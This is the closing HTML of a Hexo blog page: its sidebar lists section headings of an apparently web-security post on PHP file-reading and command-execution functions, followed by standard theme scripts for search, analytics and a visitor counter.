                    <i class="fa fa-fw fa-github"></i>GitHub</a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/CipherSaw" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>Twitter</a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-block">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="https://ctf-wiki.github.io/ctf-wiki/" title="CTF Wiki" target="_blank">CTF Wiki</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.owasp.org/index.php/Main_Page" title="OWASP" target="_blank">OWASP</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.pentest-standard.org/index.php/Main_Page" title="Pentest Standard" target="_blank">Pentest Standard</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-前言"><span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-利用文件系统函数"><span class="nav-text">0x01 利用文件系统函数</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#file"><span class="nav-text">file()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#file-get-contents"><span class="nav-text">file_get_contents()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#show-source"><span class="nav-text">show_source()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#readfile"><span class="nav-text">readfile()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#fread"><span class="nav-text">fread()</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-利用命令执行函数"><span class="nav-text">0x02 利用命令执行函数</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#执行运算符"><span class="nav-text">执行运算符</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#system"><span class="nav-text">system()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exec"><span class="nav-text">exec()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#shell-exec"><span class="nav-text">shell_exec()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#passthru"><span class="nav-text">passthru()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#popen"><span class="nav-text">popen()</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-题外话"><span class="nav-text">0x03 题外话</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#目录遍历漏洞"><span class="nav-text">目录遍历漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#查看当前-Linux-版本信息"><span class="nav-text">查看当前 Linux 版本信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#查看当前网卡信息"><span class="nav-text">查看当前网卡信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#查看当前进程信息"><span class="nav-text">查看当前进程信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#查看所有用户信息"><span class="nav-text">查看所有用户信息</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-space-shuttle"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Cipher Saw</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" href="https://hexo.io">Hexo</a></div>

  <span class="post-meta-divider">|</span>

  <div class="theme-info">Theme &mdash; <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.2</div>


        




  <script type="text/javascript">
    (function() {
      var hm = document.createElement("script");
      hm.src = "//tajs.qq.com/stats?sId=63761272";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.2"></script>



  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>


  

  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  








  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  








  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("KWe6NtO4vhgQR3IfB99JElre-gzGzoHsz", "7nrrRDyHHUMcx03upUALYKIQ");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

  <script type="text/javascript" src="https://tajs.qq.com/stats?sId=63761272" charset="UTF-8"></script>
</body>
</html>
